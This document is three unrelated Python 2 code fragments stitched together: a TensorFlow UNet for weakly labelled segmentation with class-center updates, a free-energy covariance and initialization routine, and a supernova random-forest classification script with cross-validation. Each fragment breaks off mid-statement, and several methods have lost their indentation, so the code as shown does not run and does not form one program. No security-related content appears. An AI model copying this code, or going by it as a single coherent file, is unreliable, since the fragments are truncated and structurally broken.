                            last_output = transpose2D(last_output, 2, (4, 4), True, is_training=is_training)
                        print('the last output is ', last_output)
                        print('the output is ', input_tensor)
                        if learnable_merged_flag:
                            output = tf.concat([input_tensor, alpha * last_output], axis=-1)
                        else:
                            output = tf.concat([input_tensor, last_output], axis=-1)
                    else:
                        output = input_tensor
                    # 1x1 bottleneck then 3x3 refinement at each level.
                    output = slim.conv2d(output, hidden_dim, kernel_size=1, stride=1,
                                         scope='level_' + str(idx) + '_1x1')
                    output = slim.conv2d(output, hidden_dim, kernel_size=3, stride=1,
                                         scope='level_' + str(idx) + '_3x3')
                    last_output = output
                    different_scale_outputs.append(last_output)
                    # Bring every level to the common output resolution.
                    final_output.append(tf.image.resize_images(output, output_shape))
                # NOTE(review): `/ 2` is integer division on Python 2; on
                # Python 3 it yields a float channel count — use // if porting.
                final_output = slim.conv2d(tf.concat(final_output, -1), hidden_dim * len(input_tensors) / 2,
                                           kernel_size=1, stride=1, scope='merged_1x1')
                final_output = slim.conv2d(final_output, hidden_dim * len(input_tensors) / 2,
                                           kernel_size=3, stride=1, scope='merged_3x3')
                # Local attention over the merged feature map.
                local_similarity_attention = LocalSimilarityAttention(final_output, k=3, name='final_out',
                                                                      arg_sc=arg_sc)
                final_output = local_similarity_attention.output_feature_map
                # Pre-logit feature map, reused by callers for similarity.
                self.final_feature_map = final_output
                # Raw logits: no activation, no normalisation.
                final_output = slim.conv2d(final_output, output_dim,
                                           kernel_size=1, stride=1, scope='logits', activation_fn=None,
                                           normalizer_fn=None)
                self.output = final_output
class UNet(object):
    def __init__(self, inputs, mask_input, is_training, base_model='vgg16', decoder='upsampling',
                 update_center_flag=False, batch_size=4, init_center_value=None, similarity_alpha=1.0,
                 update_center_strategy=1):
        """Build the full weakly-labelled segmentation graph.

        :param inputs: input image batch tensor
        :param mask_input: ground-truth mask batch (may be None)
        :param is_training: training flag passed to batch norm
        :param base_model: backbone key into skip_connection_setting
        :param decoder: 'upsampling' or 'transpose'
        :param update_center_flag: maintain per-class feature centers
        :param batch_size: batch size (stored, not otherwise used here)
        :param init_center_value: optional initial value for the centers
        :param similarity_alpha: alpha of the Student-t kernel in _compute_qij
        :param update_center_strategy: selects the update_centers* variant
        """
        self.inputs = inputs
        self.is_training = is_training
        self.mask_input = mask_input
        self.base_model = base_model
        self.decoder = decoder
        self.batch_size = batch_size
        self.num_classes = 2  # foreground / background
        self.hidden_dim = 128  # decoder channel width
        self.img_size = 256  # expected input resolution
        self.stride = 1  # output stride; logits resized if != 1
        self.recovery_channal = 1  # channels of the recovery head output
        self.similarity_alpha = similarity_alpha
        self.update_center_flag = update_center_flag
        self.init_center_value = init_center_value
        self.update_center_strategy = update_center_strategy
        # Assemble the graph: backbone -> decoder heads -> scores.
        self._build_network()
        self._up_down_layers()
        self._logits_to_scores()
        # if self.update_center_flag:
        #     self._compute_qij()
        #     self._compute_pij()
def _build_network(self):
import config
if config.model_type == MODEL_TYPE_vgg16:
from nets import vgg
with slim.arg_scope([slim.conv2d],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(config.weight_decay),
weights_initializer=tf.contrib.layers.xavier_initializer(),
biases_initializer=tf.zeros_initializer()):
with slim.arg_scope([slim.conv2d, slim.max_pool2d],
padding='SAME') as sc:
self.arg_scope = sc
self.net, self.end_points = vgg.basenet(
inputs=self.inputs, pooling='MAX')
elif config.model_type == MODEL_TYPE_vgg16_no_dilation:
from nets import vgg
with slim.arg_scope([slim.conv2d],
activation_fn=tf.nn.relu,
weights_regularizer=slim.l2_regularizer(config.weight_decay),
weights_initializer=tf.contrib.layers.xavier_initializer(),
biases_initializer=tf.zeros_initializer()):
with slim.arg_scope([slim.conv2d, slim.max_pool2d],
padding='SAME') as sc:
self.arg_scope = sc
self.net, self.end_points = vgg.basenet(
inputs=self.inputs, dilation=False, pooling='MAX')
else:
raise ValueError('model_type not supported:%s' % (config.model_type))
    def _up_down_layers(self):
        """Build the decoder heads on top of the backbone skip connections.

        Collects the configured skip-connection end points (deepest first),
        feeds them to two TaskNetworkModuleV2 heads — pixel classification
        and pixel-value recovery — and creates the non-trainable `centers`
        variable used by the weak-label / center-update logic.
        """
        import config
        input_tensors = []
        for idx in range(0, len(skip_connection_setting[self.base_model]))[::-1]:  # [4, 3, 2, 1, 0]
            print('basemode: ', self.base_model)
            current_layer_name = skip_connection_setting[self.base_model][idx]
            current_layer = self.end_points[current_layer_name]
            input_tensors.append(current_layer)
        # Per-pixel classification head (foreground vs. background).
        # NOTE(review): `self.img_size / self.stride` is integer division on
        # Python 2; on Python 3 it yields a float size — use // if porting.
        pixel_cls_module = TaskNetworkModuleV2(input_tensors, config.num_classes,
                                               [self.img_size / self.stride, self.img_size / self.stride],
                                               self.arg_scope, name='pixel_cls', is_training=self.is_training,
                                               decoder=self.decoder, hidden_dim=self.hidden_dim)
        # Pixel-recovery head: reconstructs pixel values; its pre-logit
        # feature map is reused as the feature space for similarity.
        pixel_recovery_module = TaskNetworkModuleV2(input_tensors, self.recovery_channal,
                                                    [self.img_size / self.stride, self.img_size / self.stride],
                                                    self.arg_scope, name='pixel_recovery', is_training=self.is_training,
                                                    decoder=self.decoder, hidden_dim=self.hidden_dim)
        self.pixel_cls_logits = pixel_cls_module.output
        self.pixel_recovery_logits = pixel_recovery_module.output
        self.pixel_recovery_features = pixel_recovery_module.final_feature_map
        self.pixel_recovery_features_num_channal = self.pixel_recovery_features.get_shape().as_list()[-1]
        # Class-center variable (one row per class); never trained by
        # gradients — updated explicitly via the update_centers* ops.
        if self.update_center_flag and self.init_center_value is not None:
            self.centers = tf.get_variable('centers', [self.num_classes, self.pixel_recovery_features_num_channal],
                                           dtype=tf.float32,
                                           initializer=lambda shape, dtype, partition_info: np.asarray(
                                               self.init_center_value,
                                               np.float32),
                                           trainable=False)
        else:
            self.centers = tf.get_variable('centers', [self.num_classes, self.pixel_recovery_features_num_channal],
                                           dtype=tf.float32, initializer=tf.truncated_normal_initializer(),
                                           trainable=False)
        tf.summary.scalar('sum_centers', tf.reduce_sum(self.centers))
        # tf.summary.histogram('centers', self.centers)
        # If predictions are at reduced resolution, bring them back to full size.
        if self.stride != 1:
            self.pixel_cls_logits = tf.image.resize_images(self.pixel_cls_logits, [self.img_size, self.img_size])
            self.pixel_recovery_logits = tf.image.resize_images(self.pixel_recovery_logits,
                                                                [self.img_size, self.img_size])
def _flat_pixel_values(self, values):
shape = values.shape.as_list()
values = tf.reshape(values, shape=[shape[0], -1, shape[-1]])
return values
    def _logits_to_scores(self):
        """Turn the head logits into scores/values, emit TensorBoard
        summaries, and cache flattened [N, H*W, C] views of the outputs."""
        self.pixel_cls_scores = tf.nn.softmax(self.pixel_cls_logits)
        # self.pixel_recovery_value = tf.nn.sigmoid(self.pixel_recovery_logits)
        # Recovery output is used raw (the sigmoid above is disabled).
        self.pixel_recovery_value = self.pixel_recovery_logits
        # Foreground-probability channel, scaled for visibility in TensorBoard.
        tf.summary.image('pred_mask', tf.expand_dims(self.pixel_cls_scores[:, :, :, 1], axis=3) * 200.0, max_outputs=1)
        tf.summary.image('image', self.inputs, max_outputs=1)
        tf.summary.scalar('max_image', tf.reduce_max(self.inputs))
        tf.summary.image('recovery_image', self.pixel_recovery_value, max_outputs=1)
        tf.summary.scalar('max_recovery_image', tf.reduce_max(self.pixel_recovery_value))
        tf.summary.scalar('min_recovery_image', tf.reduce_min(self.pixel_recovery_value))
        if self.mask_input is not None:
            tf.summary.image('mask', self.mask_input * 200, max_outputs=1)
        self.pixel_cls_logits_flatten = \
            self._flat_pixel_values(self.pixel_cls_logits)
        self.pixel_recovery_logits_flatten = self._flat_pixel_values(self.pixel_recovery_logits)
        self.pixel_cls_scores_flatten = \
            self._flat_pixel_values(self.pixel_cls_scores)
        self.pixel_recovery_value_flatten = self._flat_pixel_values(self.pixel_recovery_value)
    def _get_weakly_label_loss(self):
        '''
        Essentially an L2 loss that pulls each (positive / selected-negative)
        pixel feature toward its nearest class center, making intra-class
        features more compact.
        NOTE(review): relies on self.pos_mask and self.selected_neg_mask
        being defined elsewhere — they are not set in this chunk.
        :return: scalar loss, normalised by the number of contributing pixels
        '''
        # pixel_recovery_features = tf.nn.sigmoid(self.pixel_recovery_features)
        pixel_recovery_features = self.pixel_recovery_features
        # Squared distance of every pixel feature to every center.
        distance = tf.map_fn(
            lambda center_feature: tf.reduce_sum((pixel_recovery_features - center_feature) ** 2, axis=-1),
            self.centers, dtype=tf.float32)
        # Hard-assign each pixel to its nearest center.
        assign_label = tf.argmin(distance, axis=0)
        # Visualise the assignment (+1 so class 0 is visible, scaled for display).
        vis_tensor = assign_label + 1
        vis_tensor = tf.cast(vis_tensor * tf.cast(tf.logical_or(self.pos_mask, self.selected_neg_mask), tf.int64) * 100,
                             tf.uint8)
        tf.summary.image('assign_label', tf.expand_dims(vis_tensor, axis=3), max_outputs=1)
        # Do not backprop through the hard assignment.
        assign_label = tf.stop_gradient(assign_label)
        assign_features = tf.gather(self.centers, assign_label)
        l2loss = tf.reduce_sum((assign_features - pixel_recovery_features) ** 2, axis=-1)
        # Only positive and selected negative pixels contribute.
        l2loss_pos = l2loss * tf.cast(self.pos_mask, tf.float32)
        l2loss_neg = l2loss * tf.cast(self.selected_neg_mask, tf.float32)
        l2loss = l2loss_pos + l2loss_neg
        # Mean over the contributing pixels.
        l2loss = tf.reduce_sum(l2loss) / (
                tf.reduce_sum(tf.cast(self.pos_mask, tf.float32)) + tf.reduce_sum(
            tf.cast(self.selected_neg_mask, tf.float32)))
        return l2loss
    def update_centers_V2(self):
        '''
        Replace the centers with the mean features of the positive and
        negative areas of the current batch — effectively one fresh center
        pair per batch, so lesion-appearance differences between samples
        do not accumulate across batches.
        :return: op assigning [pos_mean, neg_mean] to self.centers
        '''
        # TODO: extend to updating one center per sample before computing the loss.
        pos_features = tf.gather_nd(self.pixel_recovery_features, tf.where(self.pos_mask))
        neg_features = tf.gather_nd(self.pixel_recovery_features, tf.where(self.selected_neg_mask))
        pos_features = tf.reduce_mean(pos_features, axis=0, keepdims=True)
        neg_features = tf.reduce_mean(neg_features, axis=0, keepdims=True)
        updated_feature = tf.concat([pos_features, neg_features], axis=0)
        center_update_op = tf.assign(self.centers, updated_feature)
        return center_update_op
    def update_centers(self, alpha):
        '''
        Center-loss style incremental update: move each center toward the
        features assigned to it, scaled by `alpha` and damped by the number
        of pixels assigned to that center in this batch.
        :param alpha: step size for the center update
        :return: op applying a scatter-subtract update to self.centers
        '''
        # pixel_recovery_features = tf.nn.sigmoid(self.pixel_recovery_features)
        pixel_recovery_features = self.pixel_recovery_features
        # Squared distance of every pixel feature to every center.
        distance = tf.map_fn(
            lambda center_feature: tf.reduce_sum((pixel_recovery_features - center_feature) ** 2, axis=-1),
            self.centers, dtype=tf.float32)
        # Hard-assign each pixel to its nearest center.
        assign_label = tf.argmin(distance, axis=0)
        # Only positive-mask or selected-negative pixels participate.
        prior_cond = tf.logical_or(self.pos_mask, self.selected_neg_mask)
        # select_cond0 = tf.logical_and(prior_cond, tf.equal(assign_label, 0))
        # select_cond1 = tf.logical_and(prior_cond, tf.equal(assign_label, 1))
        # zero_mean_feature = tf.gather_nd(pixel_recovery_features, tf.where(select_cond0))
        # one_mean_feature = tf.gather_nd(pixel_recovery_features, tf.where(select_cond1))
        # zero_mean_feature = tf.reduce_mean(zero_mean_feature, keepdims=True, axis=0)
        # zero_mean_feature = tf.where(tf.equal(tf.shape(zero_mean_feature)[0], 0),
        #                              tf.expand_dims(self.centers[0], axis=0), zero_mean_feature)
        #
        # one_mean_feature = tf.reduce_mean(one_mean_feature, keepdims=True, axis=0)
        # one_mean_feature = tf.where(tf.equal(tf.shape(one_mean_feature)[0], 0), tf.expand_dims(self.centers[1], axis=0),
        #                             one_mean_feature)
        # print zero_mean_feature, one_mean_feature
        # updated_feature = tf.concat([zero_mean_feature, one_mean_feature], axis=0)
        # centers_update_op = tf.assign(self.centers, updated_feature)
        assign_label = tf.gather_nd(assign_label, tf.where(prior_cond))
        assign_features = tf.gather(self.centers, assign_label)
        pred_features = tf.gather_nd(pixel_recovery_features, tf.where(prior_cond))
        diff = assign_features - pred_features
        # Damp each center's step by (1 + #pixels assigned to it).
        unique_label, unique_idx, unique_count = tf.unique_with_counts(assign_label)
        appear_times = tf.gather(unique_count, unique_idx)
        diff = diff / tf.expand_dims(tf.cast(1 + appear_times, tf.float32), axis=1)
        diff = alpha * diff
        centers_update_op = tf.scatter_sub(self.centers, assign_label, diff)
        return centers_update_op
    def _compute_qij(self):
        """Soft assignment q_ij of each pixel feature to each center using a
        Student-t style kernel (1 + d^2/alpha)^(-(alpha+1)/2), normalised
        over the centers (cf. the soft assignment used in t-SNE / DEC).
        NOTE: uses Python 2 `print` statements."""
        similarity_abs = tf.map_fn(
            lambda center: tf.pow(
                (1 + tf.reduce_sum(tf.square(self.pixel_recovery_features - center), axis=3) / self.similarity_alpha),
                (self.similarity_alpha + 1.) / 2. * -1.0), self.centers)
        print 'similarity_abs is ', similarity_abs
        print 'centers is ', self.centers
        # Move the center axis last: N * H * W * num_classes.
        similarity_abs = tf.transpose(similarity_abs, [1, 2, 3, 0])
        similarity_rel = similarity_abs / tf.reduce_sum(similarity_abs, axis=3, keepdims=True) # relative similarity
        self.qij = similarity_rel
def _compute_pij(self):
# fj = tf.transpose(tf.reduce_sum(self.qij, axis=[0, 1, 2], keepdims=True), [3, 0, 1, 2])
fj = tf.reduce_sum(self.qij, axis=[0, 1, 2])
print 'fj is ', fj
print 'self.qij transpose is ', tf.transpose(self.qij, [3, 0, 1, 2])
pij_abs = tf.map_fn(lambda (single_fj, single_qij): tf.div(tf.square(single_qij), single_fj),
(fj, tf.transpose(self.qij, [3, 0, 1, 2])), dtype=tf.float32)
pij_abs = tf.transpose(pij_abs, | |
N_k W_nk = 1. Actual row sum for sample %d was %f' % (firstbad, row_sums[firstbad]))
# Compute estimate of asymptotic covariance matrix using specified method.
if method == 'generalized-inverse':
# Use generalized inverse (Eq. 8 of [1]) -- most general
# Theta = W' (I - W N W')^+ W
# Construct matrices
Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) # Diagonal N_k matrix.
W = numpy.matrix(W, dtype=numpy.float64)
I = numpy.identity(N, dtype=numpy.float64)
# Compute covariance
Theta = W.T * self._pseudoinverse(I - W * Ndiag * W.T) * W
elif method == 'inverse':
# Use standard inverse method (Eq. D8 of [1]) -- only applicable if all K states are different
# Theta = [(W'W)^-1 - N + 1 1'/N]^-1
# Construct matrices
Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64) # Diagonal N_k matrix.
W = numpy.matrix(W, dtype=numpy.float64)
I = numpy.identity(N, dtype=numpy.float64)
O = numpy.ones([K,K], dtype=numpy.float64) / float(N) # matrix of ones, times 1/N
# Make sure W is nonsingular.
if (abs(numpy.linalg.det(W.T * W)) < tolerance):
print "Warning: W'W appears to be singular, yet 'inverse' method of uncertainty estimation requires W contain no duplicate states."
# Compute covariance
Theta = ( (W.T * W).I - Ndiag + O).I
elif method == 'approximate':
# Use fast approximate expression from Kong et al. -- this underestimates the true covariance, but may be a good approximation in some cases and requires no matrix inversions
# Theta = P'P
# Construct matrices
W = numpy.matrix(W, dtype=numpy.float64)
# Compute covariance
Theta = W.T * W
elif method == 'svd':
# Use singular value decomposition based approach given in supplementary material to efficiently compute uncertainty
# See Appendix D.1, Eq. D4 in [1].
# Construct matrices
Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64)
W = numpy.matrix(W, dtype=numpy.float64)
I = numpy.identity(K, dtype=numpy.float64)
# Compute SVD of W
[U, S, Vt] = numpy.linalg.svd(W)
Sigma = numpy.matrix(numpy.diag(S))
V = numpy.matrix(Vt).T
# Compute covariance
Theta = V * Sigma * self._pseudoinverse(I - Sigma * V.T * Ndiag * V * Sigma) * Sigma * V.T
elif method == 'svd-ew':
# Use singular value decomposition based approach given in supplementary material to efficiently compute uncertainty
# The eigenvalue decomposition of W'W is used to forego computing the SVD.
# See Appendix D.1, Eqs. D4 and D5 of [1].
# Construct matrices
Ndiag = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64)
W = numpy.matrix(W, dtype=numpy.float64)
I = numpy.identity(K, dtype=numpy.float64)
# Compute singular values and right singular vectors of W without using SVD
# Instead, we compute eigenvalues and eigenvectors of W'W.
# Note W'W = (U S V')'(U S V') = V S' U' U S V' = V (S'S) V'
[S2, V] = numpy.linalg.eigh(W.T * W)
# Set any slightly negative eigenvalues to zero.
S2[numpy.where(S2 < 0.0)] = 0.0
# Form matrix of singular values Sigma, and V.
Sigma = numpy.matrix(numpy.diag(numpy.sqrt(S2)))
V = numpy.matrix(V)
# Compute covariance
Theta = V * Sigma * self._pseudoinverse(I - Sigma * V.T * Ndiag * V * Sigma) * Sigma * V.T
elif method == 'tan-HGH':
# Use method suggested by Zhiqiang Tan without further simplification.
# TODO: There may be a problem here -- double-check this.
[N,K] = W.shape
# Estimate O matrix from W'W.
W = numpy.matrix(W, dtype=numpy.float64)
O = W.T * W
# Assemble the Lambda matrix.
Lambda = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64)
# Identity matrix.
I = numpy.matrix(numpy.eye(K), dtype=numpy.float64)
# Compute H and G matrices.
H = O*Lambda - I
G = O - O*Lambda*O
# Compute pseudoinverse of H
Hinv = self._pseudoinverse(H)
# Compute estimate of asymptotic covariance.
Theta = Hinv * G * Hinv.T
elif method == 'tan':
# Use method suggested by <NAME>.
# Estimate O matrix from W'W.
W = numpy.matrix(W, dtype=numpy.float64)
O = W.T * W
# Assemble the Lambda matrix.
Lambda = numpy.matrix(numpy.diag(N_k), dtype=numpy.float64)
# Compute covariance.
Oinv = self._pseudoinverse(O)
Theta = self._pseudoinverse(Oinv - Lambda)
else:
# Raise an exception.
raise ParameterError('Method ' + method + ' unrecognized.')
return Theta
#=============================================================================================
    def _initializeFreeEnergies(self, verbose=False, method='zeros'):
        """
        Compute an initial guess at the relative free energies.

        OPTIONAL ARGUMENTS
          verbose (boolean) - If True, will print debug information (default: False)
          method (string) - Method for initializing guess at free energies.
            'zeros' - all free energies are initially set to zero
            'mean-reduced-potential' - the mean reduced potential is used
            'BAR' - chain pairwise BAR estimates over the states that have
              samples to seed the iteration

        Side effects: overwrites self.f_k and shifts it so f_k[0] == 0.
        Raises ParameterError for an unrecognized method.
        NOTE: uses Python 2 `print` statements.
        """
        if (method == 'zeros'):
            # Use zeros for initial free energies.
            if verbose: print "Initializing free energies to zero."
            self.f_k[:] = 0.0
        elif (method == 'mean-reduced-potential'):
            # Compute initial guess at free energies from the mean reduced potential from each state
            if verbose: print "Initializing free energies with mean reduced potential for each state."
            means = numpy.zeros([self.K],float)
            for k in self.nonzero_N_k_indices:
                means[k] = self.u_kln[k,k,0:self.N_k[k]].mean()
            if (numpy.max(numpy.abs(means)) < 0.000001):
                print "Warning: All mean reduced potentials are close to zero. If you are using energy differences in the u_kln matrix, then the mean reduced potentials will be zero, and this is expected behavoir."
            self.f_k = means
        elif (method == 'BAR'):
            # TODO: Can we guess a good path for this initial guess for arbitrary "topologies"?
            # For now, make a simple list of those states with samples.
            initialization_order = numpy.where(self.N_k > 0)[0]
            # Initialize all f_k to zero.
            self.f_k[:] = 0.0
            # Chain pairwise BAR estimates along consecutive sampled states.
            for index in range(0, numpy.size(initialization_order)-1):
                k = initialization_order[index]
                l = initialization_order[index+1]
                w_F = (self.u_kln[k, l, 0:self.N_k[k]] - self.u_kln[k, k, 0:self.N_k[k]]) # forward work
                w_R = (self.u_kln[l, k, 0:self.N_k[l]] - self.u_kln[l, l, 0:self.N_k[l]]) # reverse work
                if (len(w_F) > 0 and len(w_R) > 0):
                    # BAR solution doesn't need to be incredibly accurate to kickstart NR.
                    self.f_k[l] = self.f_k[k] + computeBAR(w_F, w_R, relative_tolerance=0.000001, verbose=False, compute_uncertainty=False)
                else:
                    # no states observed, so we don't need to initialize this free energy anyway, as
                    # the solution is noniterative.
                    self.f_k[l] = 0
        else:
            # The specified method is not implemented.
            raise ParameterError('Method ' + method + ' unrecognized.')
        # Shift all free energies such that f_0 = 0.
        self.f_k[:] = self.f_k[:] - self.f_k[0]
        return
#=============================================================================================
def _computeUnnormalizedLogWeights(self, u_kn):
"""
Return unnormalized log weights.
REQUIRED ARGUMENTS
u_kn (K x N_max numpy float64 array) - reduced potential energies
OPTIONAL ARGUMENTS
RETURN VALUES
log_w_kn (K x N_max numpy float64 array) - unnormalized log weights
REFERENCE
'log weights' here refers to \log [ \sum_{k=1}^K N_k exp[f_k - (u_k(x_n) - u(x_n)] ]
"""
if (self.use_embedded_helper_code):
# Use embedded C++ optimizations.
import _pymbar
u_kn = numpy.array(u_kn, dtype=numpy.float64) # necessary for helper code to interpret type of u_kn
log_w_kn = _pymbar.computeUnnormalizedLogWeightsCpp(self.K, self.N_max, self.K_nonzero, self.nonzero_N_k_indices, self.N_k, self.f_k, self.u_kln, u_kn);
else:
try:
#z= 1/0
#pass
from scipy import weave
# Allocate storage for return values.
log_w_kn = numpy.zeros([self.K,self.N_max], dtype=numpy.float64)
# Copy useful class members to local variables.
K = self.K
f_k = self.f_k
N_k = self.N_k
u_kln = self.u_kln
# Weave inline C++ code.
code = """
double log_terms[%(K)d]; // temporary storage for log terms
for (int k = 0; k < K; k++) {
for (int n = 0; n < N_K1(k); n++) {
double max_log_term = 0.0;
bool first_nonzero = true;
for (int j = 0; j < K; j++) {
// skip empty states
if (N_K1(j) == 0) continue;
double log_term = log(N_K1(j)) + F_K1(j) - U_KLN3(k,j,n) + U_KN2(k,n);
log_terms[j] = log_term;
if (first_nonzero || (log_term > max_log_term)) {
max_log_term = log_term;
first_nonzero = false;
}
}
double term_sum = 0.0;
for (int j = 0; j < K; j++) {
// skip empty states
if (N_K1(j) == 0) continue;
term_sum += exp(log_terms[j] - max_log_term);
}
double log_term_sum = log(term_sum) + max_log_term;
LOG_W_KN2(k,n) = - log_term_sum;
}
}
""" % vars()
# Execute inline C code with weave.
info = weave.inline(code, ['K', 'N_k', 'u_kn', 'u_kln', 'f_k', 'log_w_kn'], headers=['<math.h>', '<stdlib.h>'], verbose=2)
except:
# Compute unnormalized log weights in pure | |
n_bins=Nbins_RFP)
# Calibration summary: fraction of true positives per probability bin.
# NOTE: this script is Python 2 (bare `print` statements throughout).
print "Fraction of True Positives in",Nbins_RFP,"probabilty bins"
print ' '.join(['{:.3f}'.format(f) for f in fraction_true])
#TEMPLATE STATISTICS
print "\nTemplate Statistics for {} Data".format(sim)
# Unique SN template ids and their occurrence counts in the test data.
templates, counts = np.unique(data_test['sim_nonIa'].quantity.value, return_counts=True)
template_dict = dict(zip(templates, counts))
#statistics for numbers of true and ML types for each template
template_stats={}
for tmplt in template_dict:
    template_stats[tmplt]={}
    for typ in MLtypes:
        template_stats[tmplt][CLFid+typ]=np.sum(predict[Test][typ] & (data_test['sim_nonIa']==tmplt))
        template_stats[tmplt]['True'+typ]=np.sum(true[Test][typ] & (data_test['sim_nonIa']==tmplt))
        # Record the (last) true type that occurs for this template.
        if(template_stats[tmplt]['True'+typ]>0):
            template_stats[tmplt]['Type']=typ
#count template occurrences for SN classified as Ia
CLFIa_mask = (probs[sim] > P_eff[sim])
CLFIa_templates, CLFIa_counts = np.unique(data_test['sim_nonIa'][CLFIa_mask].quantity.value, return_counts=True)
Iatemplate_dict = dict(zip(CLFIa_templates, CLFIa_counts))
print "\nType\t|\tValue"
#need to print in frequency order
keys=Iatemplate_dict.keys()
template_freq = sorted(Iatemplate_dict.values())
template_freq.reverse()
ordered_keys=[]
# Walk frequencies high-to-low and print each template once.
for freq in template_freq:
    #index=freqs.index(freq)
    for key in keys:
        if Iatemplate_dict[key]==freq:
            if not(key in ordered_keys):
                print key,'\t|\t' ,freq
                ordered_keys.append(key)
npop=5
print npop,"most popular templates and frequencies for passing MLIa",ordered_keys[0:npop],template_freq[0:npop]
#sys.exit()
#CROSS_VALIDATION
# read in data
if(args.cv):
    # Select the sample to cross-validate on: (t)rain, (v)alidation, or (b)oth.
    if(args.sample=='t'):
        data_all = ttrain
    # read in validation data only
    elif(args.sample=='v'):
        data_all = ttest
    # combine both training and validation sets
    elif(args.sample=='b'):
        data_all = vstack([ttrain, ttest])
    #data_all = read_sample()
    snr_cut = data_all['snr1']>SNRcut # no cut at the moment
    data = data_all[snr_cut]
    X_data = get_features(args.ft, data)
    # Get y_data (class labels)
    if(args.nclass==2):
        print '\n\t2-WAY CLASSIFICATION'
        y_data = data['type'] # class 1=Ia match, 0=CC match
    elif(args.nclass==3):
        print '\n\t3-WAY CLASSIFICATION'
        y_data = data['type3'] #3-way typing
    #y_ROC = data['type'] # for ROC curve, need binary labels
    # Fresh classifier with the same hyper-parameters as the main fit.
    cvclf = RandomForestClassifier(n_estimators=n_estimators, max_features=max_features, \
                                   min_samples_split=min_samples_split, criterion=criterion, n_jobs=args.nc)
    print '\n\nNow try cross-validation methods ...'
    # Stratified k-fold cross-validation and compute scoring metric each time
    print '\n----- Stratified K-fold cross-validation -----\n'
    kvals = []
    avgskf = []
    stdkf = []
    # Sweep the number of folds and record mean score and its standard error.
    for k in range(2, 11):
        kf = StratifiedKFold(y_data, n_folds=k, shuffle=True, random_state=42) # define cross validator
        cv_scores_kf = cross_val_score(cvclf, X_data, y_data, scoring=score_func_est, cv=kf)
        print 'k={} folds CV scores : '.format(k), cv_scores_kf
        kvals.append(k)
        avgskf.append(np.mean(cv_scores_kf))
        stdkf.append(np.std(cv_scores_kf)/np.sqrt(float(len(cv_scores_kf))))
    # ShuffleSplit with n iterations
    print '\n\n----- ShuffleSplit iterations -----'
    test_step = 0.1
    tsvals = []
    avgss = []
    stdss = []
    # Sweep the held-out fraction and record mean score and its standard error.
    for ts in np.arange(0.1, 1, test_step):
        print 'Fractional Test Size : ', ts
        ss = ShuffleSplit(len(y_data), n_iter=args.niter, test_size=ts, random_state=42) # BUG: don't use train_size
        for train_index, test_index in ss:
            train1as = y_data[train_index]==0
            test1as = y_data[test_index]==0
            print "TRAIN SNIa:", np.sum(train1as), "\tTEST SNIa:", np.sum(test1as)
        cv_scores_ss = cross_val_score(cvclf, X_data, y_data, scoring=score_func_est, cv=ss) #array of score values
        print '\nCV scores (ShuffleSplit) = ', cv_scores_ss
        #print 'Average Score = ', np.mean(cv_scores_ss)
        #print 'Score Standard Deviation = ', np.std(cv_scores_ss)
        tsvals.append(ts)
        avgss.append(np.mean(cv_scores_ss))
        stdss.append(np.std(cv_scores_ss)/np.sqrt(float(len(cv_scores_ss))))
#endif--args.cv
if(args.pc):
    # Score the trained classifier on test files generated at fixed purities.
    pfilename='DES_validation_fitprob_purity='
    print "\nUsing purities",args.purities,"for test files"
    pscores=[]
    for purity in args.purities:
        ptestfile=pfilename+str(purity)+'.txt'
        ptest=read(ptestfile)
        #print "Size of purity =",purity,"test data:",len(ptest)
        # Apply the same SNR cut as for the main samples.
        cutptest=(ptest['snr1']>SNRcut)
        ptest = ptest[cutptest]
        print "Size of purity =",purity,"test data (after SNR cut):",len(ptest)
        X_ptest=get_features(args.ft, ptest)
        # Pick the label column matching the classification mode.
        if(args.nclass==2):
            y_ptest = ptest['type']
        elif(args.nclass==3):
            y_ptest = ptest['type3']
        elif(args.nclass==4):
            y_ptest = ptest['type2x2']
        pprobs=clf.predict_proba(X_ptest)[:, 0] # SNeIa are class 0
        #print len(X_ptest),len(pprobs),len(y_ptest)
        pscore=score_func(pprobs, y_ptest)
        print "Score for purity",purity,"=",pscore
        pscores.append(pscore)
    #endfor
#endif--args.pc
if(len(args.plotdir)==0):
print "Skipping plots and exiting"
sys.exit()
else:
print '\n********** STARTING PLOTS **********\n'
#setup pdf file name and other filenames for saving efficiencies etc
file_id='_{}'.format(args.filestr)
fnpurity=''
SNR=''
if ('purity' in args.test):
fnpurity='purity'+re.split('purity',os.path.splitext(args.test)[0])[1]
if ('SNR' in args.test):
SNR='SNR'+re.split('SNR',os.path.splitext(args.test)[0])[1]
if(len(datalist)>0):
dname='_'+'+'.join(datalist)+'Data'
else:
dname=''
pdfname = os.path.join(args.plotdir,'_'.join(['eff_pur_DES',str(args.nclass),'way_typing',str(nfeatures)+'features',SNR,fnpurity])+withpdf+dname+file_id+'.pdf')
multiPdf = PdfPages(pdfname)
#Setup "sim" data to plot
alldata={}
mask={}
#setup cuts according to type and save in alldata dict
for sim in simlist:
if (sim==Training):
simdata=data_train
simlabel=Training
else:
simdata=data_test
simlabel=Test
simdata['true_mu']=simdata['sim_mu']
#augment simdata with other variables
simdata[HR]=simdata['mu']-simdata['sim_mu'] #Hubble Residual
#add to dict
smaskIa=simdata['sim_nonIa']==0
smaskCC=simdata['sim_nonIa']>0
smaskIbc=simdata['type3']==1
smaskII=simdata['type3']==2
mask[sim]={Ia:smaskIa,CC:smaskCC,Ibc:smaskIbc,II:smaskII}
alldata[sim]={Ia:simdata[mask[sim][Ia]],CC:simdata[mask[sim][CC]],Ibc:simdata[mask[sim][Ibc]],II:simdata[mask[sim][II]],Total:simdata}
#plotlabels[Sim][simlabel]=plotlabels[Sim][simlabel] + ' Data'
#add CLFtype, TP and FP to dict for samples != Training
if not(sim==Training):
for t in MLtypes:
alldata[sim][CLFid+t]=simdata[predict[sim][t]]
alldata[sim][CLFid+TP+t]=simdata[CLFstats[sim][TP][t]]
alldata[sim][CLFid+FP+t]=simdata[CLFstats[sim][FP][t]]
#add CLFTotal for consistency and weights; will not need totals for TP and FP types
alldata[sim][CLFid+Total]=simdata
for key in sorted(alldata.keys()):
print "\nPlotting",key,"(simulated) data:"
for t in alldata[key].keys():
print "Number of type {} = {}".format(t,len(alldata[key][t]))
#Setup "observed" data to plot
obsdata={}
P_eff_ref = P_eff[Test]
